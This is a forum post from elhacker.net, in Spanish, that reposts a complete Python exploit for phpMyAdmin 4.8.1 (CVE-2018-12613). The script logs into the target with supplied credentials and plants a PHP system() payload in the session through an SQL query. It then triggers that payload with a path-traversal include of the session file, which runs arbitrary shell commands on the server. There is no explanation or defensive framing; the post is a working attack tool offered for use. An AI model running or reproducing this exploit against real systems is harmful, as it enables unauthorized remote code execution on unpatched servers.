elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  phpMyAdmin 4.8.1 - Remote Code Execution (RCE) CVE 2018-12613
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: phpMyAdmin 4.8.1 - Remote Code Execution (RCE) CVE 2018-12613  (Leído 3,480 veces)
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.641


La libertad no se suplica, se conquista


Ver Perfil WWW
phpMyAdmin 4.8.1 - Remote Code Execution (RCE) CVE 2018-12613
« en: 26 Diciembre 2021, 10:19 am »

Código
  1. # Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
  2. # Date: 17/08/2021
  3. # Exploit Author: samguy
  4. # Vulnerability Discovery By: ChaMd5 & Henry Huang
  5. # Vendor Homepage: http://www.phpmyadmin.net
  6. # Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
  7. # Version: 4.8.1
  8. # Tested on: Linux - Debian Buster (PHP 7.3)
  9. # CVE : CVE-2018-12613
  10.  
  11. #!/usr/bin/env python
  12.  
  13. import re, requests, sys
  14.  
  15. # check python major version
  16. if sys.version_info.major == 3:
  17.  import html
  18. else:
  19.  from six.moves.html_parser import HTMLParser
  20.  html = HTMLParser()
  21.  
  22. if len(sys.argv) < 7:
  23.  usage = """Usage: {} [ipaddr] [port] [path] [username] [password] [command]
  24. Example: {} 192.168.56.65 8080 /phpmyadmin username password whoami"""
  25.  print(usage.format(sys.argv[0],sys.argv[0]))
  26.  exit()
  27.  
  28. def get_token(content):
  29.  s = re.search('token"\s*value="(.*?)"', content)
  30.  token = html.unescape(s.group(1))
  31.  return token
  32.  
  33. ipaddr = sys.argv[1]
  34. port = sys.argv[2]
  35. path = sys.argv[3]
  36. username = sys.argv[4]
  37. password = sys.argv[5]
  38. command = sys.argv[6]
  39.  
  40. url = "http://{}:{}{}".format(ipaddr,port,path)
  41.  
  42. # 1st req: check login page and version
  43. url1 = url + "/index.php"
  44. r = requests.get(url1)
  45. content = r.content.decode('utf-8')
  46. if r.status_code != 200:
  47.  print("Unable to find the version")
  48.  exit()
  49.  
  50. s = re.search('PMA_VERSION:"(\d+\.\d+\.\d+)"', content)
  51. version = s.group(1)
  52. if version != "4.8.0" and version != "4.8.1":
  53.  print("The target is not exploitable".format(version))
  54.  exit()
  55.  
  56. # get 1st token and cookie
  57. cookies = r.cookies
  58. token = get_token(content)
  59.  
  60. # 2nd req: login
  61. p = {'token': token, 'pma_username': username, 'pma_password': password}
  62. r = requests.post(url1, cookies = cookies, data = p)
  63. content = r.content.decode('utf-8')
  64. s = re.search('logged_in:(\w+),', content)
  65. logged_in = s.group(1)
  66. if logged_in == "false":
  67.  print("Authentication failed")
  68.  exit()
  69.  
  70. # get 2nd token and cookie
  71. cookies = r.cookies
  72. token = get_token(content)
  73.  
  74. # 3rd req: execute query
  75. url2 = url + "/import.php"
  76. # payload
  77. payload = '''select '<?php system("{}") ?>';'''.format(command)
  78. p = {'table':'', 'token': token, 'sql_query': payload }
  79. r = requests.post(url2, cookies = cookies, data = p)
  80. if r.status_code != 200:
  81.  print("Query failed")
  82.  exit()
  83.  
  84. # 4th req: execute payload
  85. session_id = cookies.get_dict()['phpMyAdmin']
  86. url3 = url + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}".format(session_id)
  87. r = requests.get(url3, cookies = cookies)
  88. if r.status_code != 200:
  89.  print("Exploit failed")
  90.  exit()
  91.  
  92. # get result
  93. content = r.content.decode('utf-8', errors="replace")
  94. s = re.search("select '(.*?)\n'", content, re.DOTALL)
  95. if s != None:
  96.  print(s.group(1))
  97.  
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines